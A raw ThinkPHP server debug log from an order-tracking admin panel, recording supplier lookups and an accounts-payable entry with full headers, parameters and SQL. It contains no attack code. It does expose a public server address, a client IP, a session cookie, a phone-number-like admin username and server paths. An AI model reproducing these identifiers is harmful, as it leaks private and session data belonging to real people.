] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008363s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000462s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001648s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000427s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 10,10 [ RunTime:0.000401s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001455s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"2\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308702) [ RunTime:0.005664s ] --------------------------------------------------------------- [ 2022-07-20T17:18:23+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.052764s][吞吐率:18.95req/s] [内存消耗:4,963.14kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001215s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '3', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001627s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007314s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000534s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001559s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000725s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 20,10 [ RunTime:0.000799s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001607s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"3\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308703) [ RunTime:0.004449s ] --------------------------------------------------------------- [ 2022-07-20T17:18:27+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.055583s][吞吐率:17.99req/s] [内存消耗:4,963.09kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001279s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '2', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001724s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009267s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000542s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001455s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000436s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 10,10 [ RunTime:0.000532s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001530s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"2\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308707) [ RunTime:0.006404s ] --------------------------------------------------------------- [ 2022-07-20T17:18:43+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.070853s][吞吐率:14.11req/s] [内存消耗:5,473.91kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001065s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '236', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'row' => array ( 'subject_type' => '1', 'suppliercustomer_id' => '89', 'worker_id' => '', 'explain' => '6月份快递费', 'money' => '209', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001469s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008138s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000544s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001376s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000622s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001287s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001314s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001690s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000378s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001254s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountspayable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000604s ] [ sql ] [ SQL ] INSERT INTO `ot_accountspayable` (`subject_type` , `suppliercustomer_id` , `worker_id` , `explain` , `money` , `factorymge_id` , `year` , `month` , `day` , `createtime` , `updatetime` , `yu_money`) VALUES (1 , 89 , 0 , '6月份快递费' , 209 , 40 , 2022 , 7 , 20 , 1658308723 , 1658308723 , 747965.81) [ RunTime:0.004551s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001565s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 应付账款 添加' , '{\"dialog\":\"1\",\"row\":{\"subject_type\":\"1\",\"suppliercustomer_id\":\"89\",\"worker_id\":\"\",\"explain\":\"6\\u6708\\u4efd\\u5feb\\u9012\\u8d39\",\"money\":\"209\"}}' , '/admin/financial/accountspayable/add?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308723) [ RunTime:0.005120s ] --------------------------------------------------------------- [ 2022-07-20T17:18:43+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318505 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318505 [运行时间:0.075167s][吞吐率:13.30req/s] [内存消耗:5,683.32kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001135s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1658308318505', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001650s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000108s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000597s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001515s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000428s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001122s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001140s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001842s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000440s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001543s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001189s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001100s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001229s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.003462s ] --------------------------------------------------------------- [ 2022-07-20T17:18:46+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1 [运行时间:0.058115s][吞吐率:17.21req/s] [内存消耗:5,261.61kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000062s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001229s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001579s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/choosecustom.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000121s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000403s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001317s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000463s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001093s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001536s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001673s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000342s ] --------------------------------------------------------------- [ 2022-07-20T17:18:46+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308726 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658308726 [运行时间:0.033469s][吞吐率:29.88req/s] [内存消耗:3,854.64kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000065s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001182s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658308726', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001734s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:18:47+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658308726434 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658308726434 [运行时间:0.076203s][吞吐率:13.12req/s] [内存消耗:5,683.39kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001102s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 